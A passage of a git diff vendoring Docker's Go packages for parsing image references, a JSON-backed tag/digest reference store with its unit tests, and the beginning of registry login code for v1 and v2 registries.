if strings.HasPrefix(remoteName, DefaultRepoPrefix) { + return strings.TrimPrefix(remoteName, DefaultRepoPrefix), nil + } + return remoteName, nil + } + return name, nil +} + +func validateName(name string) error { + if err := v1.ValidateID(name); err == nil { + return fmt.Errorf("Invalid repository name (%s), cannot specify 64-byte hexadecimal strings", name) + } + return nil +} diff --git a/vendor/github.com/docker/docker/reference/reference_test.go b/vendor/github.com/docker/docker/reference/reference_test.go new file mode 100644 index 0000000000..ff35ba3da2 --- /dev/null +++ b/vendor/github.com/docker/docker/reference/reference_test.go @@ -0,0 +1,275 @@ +package reference + +import ( + "testing" + + "github.com/docker/distribution/digest" +) + +func TestValidateReferenceName(t *testing.T) { + validRepoNames := []string{ + "docker/docker", + "library/debian", + "debian", + "docker.io/docker/docker", + "docker.io/library/debian", + "docker.io/debian", + "index.docker.io/docker/docker", + "index.docker.io/library/debian", + "index.docker.io/debian", + "127.0.0.1:5000/docker/docker", + "127.0.0.1:5000/library/debian", + "127.0.0.1:5000/debian", + "thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev", + } + invalidRepoNames := []string{ + "https://github.com/docker/docker", + "docker/Docker", + "-docker", + "-docker/docker", + "-docker.io/docker/docker", + "docker///docker", + "docker.io/docker/Docker", + "docker.io/docker///docker", + "1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", + "docker.io/1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", + } + + for _, name := range invalidRepoNames { + _, err := ParseNamed(name) + if err == nil { + t.Fatalf("Expected invalid repo name for %q", name) + } + } + + for _, name := range validRepoNames { + _, err := ParseNamed(name) + if err != nil { + t.Fatalf("Error parsing repo name %s, got: %q", name, err) + } + } +} + +func TestValidateRemoteName(t *testing.T) { + validRepositoryNames := []string{ + // Sanity check. + "docker/docker", + + // Allow 64-character non-hexadecimal names (hexadecimal names are forbidden). + "thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev", + + // Allow embedded hyphens. + "docker-rules/docker", + + // Allow multiple hyphens as well. + "docker---rules/docker", + + //Username doc and image name docker being tested. + "doc/docker", + + // single character names are now allowed. + "d/docker", + "jess/t", + + // Consecutive underscores. + "dock__er/docker", + } + for _, repositoryName := range validRepositoryNames { + _, err := ParseNamed(repositoryName) + if err != nil { + t.Errorf("Repository name should be valid: %v. Error: %v", repositoryName, err) + } + } + + invalidRepositoryNames := []string{ + // Disallow capital letters. + "docker/Docker", + + // Only allow one slash. + "docker///docker", + + // Disallow 64-character hexadecimal. + "1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", + + // Disallow leading and trailing hyphens in namespace. + "-docker/docker", + "docker-/docker", + "-docker-/docker", + + // Don't allow underscores everywhere (as opposed to hyphens). + "____/____", + + "_docker/_docker", + + // Disallow consecutive periods. + "dock..er/docker", + "dock_.er/docker", + "dock-.er/docker", + + // No repository. + "docker/", + + //namespace too long + "this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255/docker", + } + for _, repositoryName := range invalidRepositoryNames { + if _, err := ParseNamed(repositoryName); err == nil { + t.Errorf("Repository name should be invalid: %v", repositoryName) + } + } +} + +func TestParseRepositoryInfo(t *testing.T) { + type tcase struct { + RemoteName, NormalizedName, FullName, AmbiguousName, Hostname string + } + + tcases := []tcase{ + { + RemoteName: "fooo/bar", + NormalizedName: "fooo/bar", + FullName: "docker.io/fooo/bar", + AmbiguousName: "index.docker.io/fooo/bar", + Hostname: "docker.io", + }, + { + RemoteName: "library/ubuntu", + NormalizedName: "ubuntu", + FullName: "docker.io/library/ubuntu", + AmbiguousName: "library/ubuntu", + Hostname: "docker.io", + }, + { + RemoteName: "nonlibrary/ubuntu", + NormalizedName: "nonlibrary/ubuntu", + FullName: "docker.io/nonlibrary/ubuntu", + AmbiguousName: "", + Hostname: "docker.io", + }, + { + RemoteName: "other/library", + NormalizedName: "other/library", + FullName: "docker.io/other/library", + AmbiguousName: "", + Hostname: "docker.io", + }, + { + RemoteName: "private/moonbase", + NormalizedName: "127.0.0.1:8000/private/moonbase", + FullName: "127.0.0.1:8000/private/moonbase", + AmbiguousName: "", + Hostname: "127.0.0.1:8000", + }, + { + RemoteName: "privatebase", + NormalizedName: "127.0.0.1:8000/privatebase", + FullName: "127.0.0.1:8000/privatebase", + AmbiguousName: "", + Hostname: "127.0.0.1:8000", + }, + { + RemoteName: "private/moonbase", + NormalizedName: "example.com/private/moonbase", + FullName: "example.com/private/moonbase", + AmbiguousName: "", + Hostname: "example.com", + }, + { + RemoteName: "privatebase", + NormalizedName: "example.com/privatebase", + FullName: "example.com/privatebase", + AmbiguousName: "", + Hostname: "example.com", + }, + { + RemoteName: "private/moonbase", + NormalizedName: "example.com:8000/private/moonbase", + FullName: "example.com:8000/private/moonbase", + AmbiguousName: "", + Hostname: "example.com:8000", + }, + { + RemoteName: "privatebasee", + NormalizedName: "example.com:8000/privatebasee", + FullName: "example.com:8000/privatebasee", + AmbiguousName: "", + Hostname: "example.com:8000", + }, + { + RemoteName: "library/ubuntu-12.04-base", + NormalizedName: "ubuntu-12.04-base", + FullName: "docker.io/library/ubuntu-12.04-base", + AmbiguousName: "index.docker.io/library/ubuntu-12.04-base", + Hostname: "docker.io", + }, + } + + for _, tcase := range tcases { + refStrings := []string{tcase.NormalizedName, tcase.FullName} + if tcase.AmbiguousName != "" { + refStrings = append(refStrings, tcase.AmbiguousName) + } + + var refs []Named + for _, r := range refStrings { + named, err := ParseNamed(r) + if err != nil { + t.Fatal(err) + } + refs = append(refs, named) + named, err = WithName(r) + if err != nil { + t.Fatal(err) + } + refs = append(refs, named) + } + + for _, r := range refs { + if expected, actual := tcase.NormalizedName, r.Name(); expected != actual { + t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual) + } + if expected, actual := tcase.FullName, r.FullName(); expected != actual { + t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual) + } + if expected, actual := tcase.Hostname, r.Hostname(); expected != actual { + t.Fatalf("Invalid hostname for %q. Expected %q, got %q", r, expected, actual) + } + if expected, actual := tcase.RemoteName, r.RemoteName(); expected != actual { + t.Fatalf("Invalid remoteName for %q. Expected %q, got %q", r, expected, actual) + } + + } + } +} + +func TestParseReferenceWithTagAndDigest(t *testing.T) { + ref, err := ParseNamed("busybox:latest@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa") + if err != nil { + t.Fatal(err) + } + if _, isTagged := ref.(NamedTagged); isTagged { + t.Fatalf("Reference from %q should not support tag", ref) + } + if _, isCanonical := ref.(Canonical); !isCanonical { + t.Fatalf("Reference from %q should not support digest", ref) + } + if expected, actual := "busybox@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa", ref.String(); actual != expected { + t.Fatalf("Invalid parsed reference for %q: expected %q, got %q", ref, expected, actual) + } +} + +func TestInvalidReferenceComponents(t *testing.T) { + if _, err := WithName("-foo"); err == nil { + t.Fatal("Expected WithName to detect invalid name") + } + ref, err := WithName("busybox") + if err != nil { + t.Fatal(err) + } + if _, err := WithTag(ref, "-foo"); err == nil { + t.Fatal("Expected WithName to detect invalid tag") + } + if _, err := WithDigest(ref, digest.Digest("foo")); err == nil { + t.Fatal("Expected WithName to detect invalid digest") + } +} diff --git a/vendor/github.com/docker/docker/reference/store.go b/vendor/github.com/docker/docker/reference/store.go new file mode 100644 index 0000000000..71ca236c9c --- /dev/null +++ b/vendor/github.com/docker/docker/reference/store.go @@ -0,0 +1,286 @@ +package reference + +import ( + "encoding/json" + "errors" + "fmt" + "os" + "path/filepath" + "sort" + "sync" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/ioutils" +) + +var ( + // ErrDoesNotExist is returned if a reference is not found in the + // store. + ErrDoesNotExist = errors.New("reference does not exist") +) + +// An Association is a tuple associating a reference with an image ID. +type Association struct { + Ref Named + ID digest.Digest +} + +// Store provides the set of methods which can operate on a tag store. +type Store interface { + References(id digest.Digest) []Named + ReferencesByName(ref Named) []Association + AddTag(ref Named, id digest.Digest, force bool) error + AddDigest(ref Canonical, id digest.Digest, force bool) error + Delete(ref Named) (bool, error) + Get(ref Named) (digest.Digest, error) +} + +type store struct { + mu sync.RWMutex + // jsonPath is the path to the file where the serialized tag data is + // stored. + jsonPath string + // Repositories is a map of repositories, indexed by name. + Repositories map[string]repository + // referencesByIDCache is a cache of references indexed by ID, to speed + // up References. + referencesByIDCache map[digest.Digest]map[string]Named +} + +// Repository maps tags to digests. The key is a stringified Reference, +// including the repository name. +type repository map[string]digest.Digest + +type lexicalRefs []Named + +func (a lexicalRefs) Len() int { return len(a) } +func (a lexicalRefs) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a lexicalRefs) Less(i, j int) bool { return a[i].String() < a[j].String() } + +type lexicalAssociations []Association + +func (a lexicalAssociations) Len() int { return len(a) } +func (a lexicalAssociations) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a lexicalAssociations) Less(i, j int) bool { return a[i].Ref.String() < a[j].Ref.String() } + +// NewReferenceStore creates a new reference store, tied to a file path where +// the set of references are serialized in JSON format. +func NewReferenceStore(jsonPath string) (Store, error) { + abspath, err := filepath.Abs(jsonPath) + if err != nil { + return nil, err + } + + store := &store{ + jsonPath: abspath, + Repositories: make(map[string]repository), + referencesByIDCache: make(map[digest.Digest]map[string]Named), + } + // Load the json file if it exists, otherwise create it. + if err := store.reload(); os.IsNotExist(err) { + if err := store.save(); err != nil { + return nil, err + } + } else if err != nil { + return nil, err + } + return store, nil +} + +// AddTag adds a tag reference to the store. If force is set to true, existing +// references can be overwritten. This only works for tags, not digests. +func (store *store) AddTag(ref Named, id digest.Digest, force bool) error { + if _, isCanonical := ref.(Canonical); isCanonical { + return errors.New("refusing to create a tag with a digest reference") + } + return store.addReference(WithDefaultTag(ref), id, force) +} + +// AddDigest adds a digest reference to the store. +func (store *store) AddDigest(ref Canonical, id digest.Digest, force bool) error { + return store.addReference(ref, id, force) +} + +func (store *store) addReference(ref Named, id digest.Digest, force bool) error { + if ref.Name() == string(digest.Canonical) { + return errors.New("refusing to create an ambiguous tag using digest algorithm as name") + } + + store.mu.Lock() + defer store.mu.Unlock() + + repository, exists := store.Repositories[ref.Name()] + if !exists || repository == nil { + repository = make(map[string]digest.Digest) + store.Repositories[ref.Name()] = repository + } + + refStr := ref.String() + oldID, exists := repository[refStr] + + if exists { + // force only works for tags + if digested, isDigest := ref.(Canonical); isDigest { + return fmt.Errorf("Cannot overwrite digest %s", digested.Digest().String()) + } + + if !force { + return fmt.Errorf("Conflict: Tag %s is already set to image %s, if you want to replace it, please use -f option", ref.String(), oldID.String()) + } + + if store.referencesByIDCache[oldID] != nil { + delete(store.referencesByIDCache[oldID], refStr) + if len(store.referencesByIDCache[oldID]) == 0 { + delete(store.referencesByIDCache, oldID) + } + } + } + + repository[refStr] = id + if store.referencesByIDCache[id] == nil { + store.referencesByIDCache[id] = make(map[string]Named) + } + store.referencesByIDCache[id][refStr] = ref + + return store.save() +} + +// Delete deletes a reference from the store. It returns true if a deletion +// happened, or false otherwise. +func (store *store) Delete(ref Named) (bool, error) { + ref = WithDefaultTag(ref) + + store.mu.Lock() + defer store.mu.Unlock() + + repoName := ref.Name() + + repository, exists := store.Repositories[repoName] + if !exists { + return false, ErrDoesNotExist + } + + refStr := ref.String() + if id, exists := repository[refStr]; exists { + delete(repository, refStr) + if len(repository) == 0 { + delete(store.Repositories, repoName) + } + if store.referencesByIDCache[id] != nil { + delete(store.referencesByIDCache[id], refStr) + if len(store.referencesByIDCache[id]) == 0 { + delete(store.referencesByIDCache, id) + } + } + return true, store.save() + } + + return false, ErrDoesNotExist +} + +// Get retrieves an item from the store by reference +func (store *store) Get(ref Named) (digest.Digest, error) { + ref = WithDefaultTag(ref) + + store.mu.RLock() + defer store.mu.RUnlock() + + repository, exists := store.Repositories[ref.Name()] + if !exists || repository == nil { + return "", ErrDoesNotExist + } + + id, exists := repository[ref.String()] + if !exists { + return "", ErrDoesNotExist + } + + return id, nil +} + +// References returns a slice of references to the given ID. The slice +// will be nil if there are no references to this ID. +func (store *store) References(id digest.Digest) []Named { + store.mu.RLock() + defer store.mu.RUnlock() + + // Convert the internal map to an array for two reasons: + // 1) We must not return a mutable + // 2) It would be ugly to expose the extraneous map keys to callers. + + var references []Named + for _, ref := range store.referencesByIDCache[id] { + references = append(references, ref) + } + + sort.Sort(lexicalRefs(references)) + + return references +} + +// ReferencesByName returns the references for a given repository name. +// If there are no references known for this repository name, +// ReferencesByName returns nil. +func (store *store) ReferencesByName(ref Named) []Association { + store.mu.RLock() + defer store.mu.RUnlock() + + repository, exists := store.Repositories[ref.Name()] + if !exists { + return nil + } + + var associations []Association + for refStr, refID := range repository { + ref, err := ParseNamed(refStr) + if err != nil { + // Should never happen + return nil + } + associations = append(associations, + Association{ + Ref: ref, + ID: refID, + }) + } + + sort.Sort(lexicalAssociations(associations)) + + return associations +} + +func (store *store) save() error { + // Store the json + jsonData, err := json.Marshal(store) + if err != nil { + return err + } + return ioutils.AtomicWriteFile(store.jsonPath, jsonData, 0600) +} + +func (store *store) reload() error { + f, err := os.Open(store.jsonPath) + if err != nil { + return err + } + defer f.Close() + if err := json.NewDecoder(f).Decode(&store); err != nil { + return err + } + + for _, repository := range store.Repositories { + for refStr, refID := range repository { + ref, err := ParseNamed(refStr) + if err != nil { + // Should never happen + continue + } + if store.referencesByIDCache[refID] == nil { + store.referencesByIDCache[refID] = make(map[string]Named) + } + store.referencesByIDCache[refID][refStr] = ref + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/reference/store_test.go b/vendor/github.com/docker/docker/reference/store_test.go new file mode 100644 index 0000000000..dd1d253d8e --- /dev/null +++ b/vendor/github.com/docker/docker/reference/store_test.go @@ -0,0 +1,356 @@ +package reference + +import ( + "bytes" + "io/ioutil" + "os" + "path/filepath" + "strings" + "testing" + + "github.com/docker/distribution/digest" +) + +var ( + saveLoadTestCases = map[string]digest.Digest{ + "registry:5000/foobar:HEAD": "sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6", + "registry:5000/foobar:alternate": "sha256:ae300ebc4a4f00693702cfb0a5e0b7bc527b353828dc86ad09fb95c8a681b793", + "registry:5000/foobar:latest": "sha256:6153498b9ac00968d71b66cca4eac37e990b5f9eb50c26877eb8799c8847451b", + "registry:5000/foobar:master": "sha256:6c9917af4c4e05001b346421959d7ea81b6dc9d25718466a37a6add865dfd7fc", + "jess/hollywood:latest": "sha256:ae7a5519a0a55a2d4ef20ddcbd5d0ca0888a1f7ab806acc8e2a27baf46f529fe", + "registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6": "sha256:24126a56805beb9711be5f4590cc2eb55ab8d4a85ebd618eed72bb19fc50631c", + "busybox:latest": "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + } + + marshalledSaveLoadTestCases = []byte(`{"Repositories":{"busybox":{"busybox:latest":"sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c"},"jess/hollywood":{"jess/hollywood:latest":"sha256:ae7a5519a0a55a2d4ef20ddcbd5d0ca0888a1f7ab806acc8e2a27baf46f529fe"},"registry":{"registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6":"sha256:24126a56805beb9711be5f4590cc2eb55ab8d4a85ebd618eed72bb19fc50631c"},"registry:5000/foobar":{"registry:5000/foobar:HEAD":"sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6","registry:5000/foobar:alternate":"sha256:ae300ebc4a4f00693702cfb0a5e0b7bc527b353828dc86ad09fb95c8a681b793","registry:5000/foobar:latest":"sha256:6153498b9ac00968d71b66cca4eac37e990b5f9eb50c26877eb8799c8847451b","registry:5000/foobar:master":"sha256:6c9917af4c4e05001b346421959d7ea81b6dc9d25718466a37a6add865dfd7fc"}}}`) +) + +func TestLoad(t *testing.T) { + jsonFile, err := ioutil.TempFile("", "tag-store-test") + if err != nil { + t.Fatalf("error creating temp file: %v", err) + } + defer os.RemoveAll(jsonFile.Name()) + + // Write canned json to the temp file + _, err = jsonFile.Write(marshalledSaveLoadTestCases) + if err != nil { + t.Fatalf("error writing to temp file: %v", err) + } + jsonFile.Close() + + store, err := NewReferenceStore(jsonFile.Name()) + if err != nil { + t.Fatalf("error creating tag store: %v", err) + } + + for refStr, expectedID := range saveLoadTestCases { + ref, err := ParseNamed(refStr) + if err != nil { + t.Fatalf("failed to parse reference: %v", err) + } + id, err := store.Get(ref) + if err != nil { + t.Fatalf("could not find reference %s: %v", refStr, err) + } + if id != expectedID { + t.Fatalf("expected %s - got %s", expectedID, id) + } + } +} + +func TestSave(t *testing.T) { + jsonFile, err := ioutil.TempFile("", "tag-store-test") + if err != nil { + t.Fatalf("error creating temp file: %v", err) + } + _, err = jsonFile.Write([]byte(`{}`)) + jsonFile.Close() + defer os.RemoveAll(jsonFile.Name()) + + store, err := NewReferenceStore(jsonFile.Name()) + if err != nil { + t.Fatalf("error creating tag store: %v", err) + } + + for refStr, id := range saveLoadTestCases { + ref, err := ParseNamed(refStr) + if err != nil { + t.Fatalf("failed to parse reference: %v", err) + } + if canonical, ok := ref.(Canonical); ok { + err = store.AddDigest(canonical, id, false) + if err != nil { + t.Fatalf("could not add digest reference %s: %v", refStr, err) + } + } else { + err = store.AddTag(ref, id, false) + if err != nil { + t.Fatalf("could not add reference %s: %v", refStr, err) + } + } + } + + jsonBytes, err := ioutil.ReadFile(jsonFile.Name()) + if err != nil { + t.Fatalf("could not read json file: %v", err) + } + + if !bytes.Equal(jsonBytes, marshalledSaveLoadTestCases) { + t.Fatalf("save output did not match expectations\nexpected:\n%s\ngot:\n%s", marshalledSaveLoadTestCases, jsonBytes) + } +} + +func TestAddDeleteGet(t *testing.T) { + jsonFile, err := ioutil.TempFile("", "tag-store-test") + if err != nil { + t.Fatalf("error creating temp file: %v", err) + } + _, err = jsonFile.Write([]byte(`{}`)) + jsonFile.Close() + defer os.RemoveAll(jsonFile.Name()) + + store, err := NewReferenceStore(jsonFile.Name()) + if err != nil { + t.Fatalf("error creating tag store: %v", err) + } + + testImageID1 := digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9c") + testImageID2 := digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9d") + testImageID3 := digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9e") + + // Try adding a reference with no tag or digest + nameOnly, err := WithName("username/repo") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddTag(nameOnly, testImageID1, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + // Add a few references + ref1, err := ParseNamed("username/repo1:latest") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddTag(ref1, testImageID1, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + ref2, err := ParseNamed("username/repo1:old") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddTag(ref2, testImageID2, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + ref3, err := ParseNamed("username/repo1:alias") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddTag(ref3, testImageID1, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + ref4, err := ParseNamed("username/repo2:latest") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddTag(ref4, testImageID2, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + ref5, err := ParseNamed("username/repo3@sha256:58153dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if err = store.AddDigest(ref5.(Canonical), testImageID2, false); err != nil { + t.Fatalf("error adding to store: %v", err) + } + + // Attempt to overwrite with force == false + if err = store.AddTag(ref4, testImageID3, false); err == nil || !strings.HasPrefix(err.Error(), "Conflict:") { + t.Fatalf("did not get expected error on overwrite attempt - got %v", err) + } + // Repeat to overwrite with force == true + if err = store.AddTag(ref4, testImageID3, true); err != nil { + t.Fatalf("failed to force tag overwrite: %v", err) + } + + // Check references so far + id, err := store.Get(nameOnly) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID1 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID1.String()) + } + + id, err = store.Get(ref1) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID1 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID1.String()) + } + + id, err = store.Get(ref2) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID2 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID2.String()) + } + + id, err = store.Get(ref3) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID1 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID1.String()) + } + + id, err = store.Get(ref4) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID3 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID3.String()) + } + + id, err = store.Get(ref5) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID2 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID3.String()) + } + + // Get should return ErrDoesNotExist for a nonexistent repo + nonExistRepo, err := ParseNamed("username/nonexistrepo:latest") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if _, err = store.Get(nonExistRepo); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Get") + } + + // Get should return ErrDoesNotExist for a nonexistent tag + nonExistTag, err := ParseNamed("username/repo1:nonexist") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if _, err = store.Get(nonExistTag); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Get") + } + + // Check References + refs := store.References(testImageID1) + if len(refs) != 3 { + t.Fatal("unexpected number of references") + } + // Looking for the references in this order verifies that they are + // returned lexically sorted. + if refs[0].String() != ref3.String() { + t.Fatalf("unexpected reference: %v", refs[0].String()) + } + if refs[1].String() != ref1.String() { + t.Fatalf("unexpected reference: %v", refs[1].String()) + } + if refs[2].String() != nameOnly.String()+":latest" { + t.Fatalf("unexpected reference: %v", refs[2].String()) + } + + // Check ReferencesByName + repoName, err := WithName("username/repo1") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + associations := store.ReferencesByName(repoName) + if len(associations) != 3 { + t.Fatal("unexpected number of associations") + } + // Looking for the associations in this order verifies that they are + // returned lexically sorted. + if associations[0].Ref.String() != ref3.String() { + t.Fatalf("unexpected reference: %v", associations[0].Ref.String()) + } + if associations[0].ID != testImageID1 { + t.Fatalf("unexpected reference: %v", associations[0].Ref.String()) + } + if associations[1].Ref.String() != ref1.String() { + t.Fatalf("unexpected reference: %v", associations[1].Ref.String()) + } + if associations[1].ID != testImageID1 { + t.Fatalf("unexpected reference: %v", associations[1].Ref.String()) + } + if associations[2].Ref.String() != ref2.String() { + t.Fatalf("unexpected reference: %v", associations[2].Ref.String()) + } + if associations[2].ID != testImageID2 { + t.Fatalf("unexpected reference: %v", associations[2].Ref.String()) + } + + // Delete should return ErrDoesNotExist for a nonexistent repo + if _, err = store.Delete(nonExistRepo); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Delete") + } + + // Delete should return ErrDoesNotExist for a nonexistent tag + if _, err = store.Delete(nonExistTag); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Delete") + } + + // Delete a few references + if deleted, err := store.Delete(ref1); err != nil || deleted != true { + t.Fatal("Delete failed") + } + if _, err := store.Get(ref1); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Get") + } + if deleted, err := store.Delete(ref5); err != nil || deleted != true { + t.Fatal("Delete failed") + } + if _, err := store.Get(ref5); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Get") + } + if deleted, err := store.Delete(nameOnly); err != nil || deleted != true { + t.Fatal("Delete failed") + } + if _, err := store.Get(nameOnly); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Get") + } +} + +func TestInvalidTags(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "tag-store-test") + defer os.RemoveAll(tmpDir) + + store, err := NewReferenceStore(filepath.Join(tmpDir, "repositories.json")) + if err != nil { + t.Fatalf("error creating tag store: %v", err) + } + id := digest.Digest("sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6") + + // sha256 as repo name + ref, err := ParseNamed("sha256:abc") + if err != nil { + t.Fatal(err) + } + err = store.AddTag(ref, id, true) + if err == nil { + t.Fatalf("expected setting tag %q to fail", ref) + } + + // setting digest as a tag + ref, err = ParseNamed("registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6") + if err != nil { + t.Fatal(err) + } + err = store.AddTag(ref, id, true) + if err == nil { + t.Fatalf("expected setting digest %q to fail", ref) + } + +} diff --git a/vendor/github.com/docker/docker/registry/auth.go b/vendor/github.com/docker/docker/registry/auth.go new file mode 100644 index 0000000000..8cadd51ba0 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/auth.go @@ -0,0 +1,303 @@ +package registry + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/url" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/auth" + "github.com/docker/distribution/registry/client/auth/challenge" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" +) + +const ( + // AuthClientID is used the ClientID used for the token server + AuthClientID = "docker" +) + +// loginV1 tries to register/login to the v1 registry server. +func loginV1(authConfig *types.AuthConfig, apiEndpoint APIEndpoint, userAgent string) (string, string, error) { + registryEndpoint, err := apiEndpoint.ToV1Endpoint(userAgent, nil) + if err != nil { + return "", "", err + } + + serverAddress := registryEndpoint.String() + + logrus.Debugf("attempting v1 login to registry endpoint %s", serverAddress) + + if serverAddress == "" { + return "", "", fmt.Errorf("Server Error: Server Address not set.") + } + + loginAgainstOfficialIndex := serverAddress == IndexServer + + req, err := http.NewRequest("GET", serverAddress+"users/", nil) + if err != nil { + return "", "", err + } + req.SetBasicAuth(authConfig.Username, authConfig.Password) + resp, err := registryEndpoint.client.Do(req) + if err != nil { + // fallback when request could not be completed + return "", "", fallbackError{ + err: err, + } + } + defer resp.Body.Close() + body, err := ioutil.ReadAll(resp.Body) + if err != nil { + return "", "", err + } + if resp.StatusCode == http.StatusOK { + return "Login Succeeded", "", nil + } else if resp.StatusCode == http.StatusUnauthorized { + if loginAgainstOfficialIndex { + return "", "", fmt.Errorf("Wrong login/password, please try again. Haven't got a Docker ID? Create one at https://hub.docker.com") + } + return "", "", fmt.Errorf("Wrong login/password, please try again") + } else if resp.StatusCode == http.StatusForbidden { + if loginAgainstOfficialIndex { + return "", "", fmt.Errorf("Login: Account is not active. Please check your e-mail for a confirmation link.") + } + // *TODO: Use registry configuration to determine what this says, if anything? + return "", "", fmt.Errorf("Login: Account is not active. Please see the documentation of the registry %s for instructions how to activate it.", serverAddress) + } else if resp.StatusCode == http.StatusInternalServerError { // Issue #14326 + logrus.Errorf("%s returned status code %d. Response Body :\n%s", req.URL.String(), resp.StatusCode, body) + return "", "", fmt.Errorf("Internal Server Error") + } + return "", "", fmt.Errorf("Login: %s (Code: %d; Headers: %s)", body, + resp.StatusCode, resp.Header) +} + +type loginCredentialStore struct { + authConfig *types.AuthConfig +} + +func (lcs loginCredentialStore) Basic(*url.URL) (string, string) { + return lcs.authConfig.Username, lcs.authConfig.Password +} + +func (lcs loginCredentialStore) RefreshToken(*url.URL, string) string { + return lcs.authConfig.IdentityToken +} + +func (lcs loginCredentialStore) SetRefreshToken(u *url.URL, service, token string) { + lcs.authConfig.IdentityToken = token +} + +type staticCredentialStore struct { + auth *types.AuthConfig +} + +// NewStaticCredentialStore returns a credential store +// which always returns the same credential values. +func NewStaticCredentialStore(auth *types.AuthConfig) auth.CredentialStore { + return staticCredentialStore{ + auth: auth, + } +} + +func (scs staticCredentialStore) Basic(*url.URL) (string, string) { + if scs.auth == nil { + return "", "" + } + return scs.auth.Username, scs.auth.Password +} + +func (scs staticCredentialStore) RefreshToken(*url.URL, string) string { + if scs.auth == nil { + return "" + } + return scs.auth.IdentityToken +} + +func (scs staticCredentialStore) SetRefreshToken(*url.URL, string, string) { +} + +type fallbackError struct { + err error +} + +func (err fallbackError) Error() string { + return err.err.Error() +} + +// loginV2 tries to login to the v2 registry server. The given registry +// endpoint will be pinged to get authorization challenges. These challenges +// will be used to authenticate against the registry to validate credentials. +func loginV2(authConfig *types.AuthConfig, endpoint APIEndpoint, userAgent string) (string, string, error) { + logrus.Debugf("attempting v2 login to registry endpoint %s", strings.TrimRight(endpoint.URL.String(), "/")+"/v2/") + + modifiers := DockerHeaders(userAgent, nil) + authTransport := transport.NewTransport(NewTransport(endpoint.TLSConfig), modifiers...) + + credentialAuthConfig := *authConfig + creds := loginCredentialStore{ + authConfig: &credentialAuthConfig, + } + + loginClient, foundV2, err := 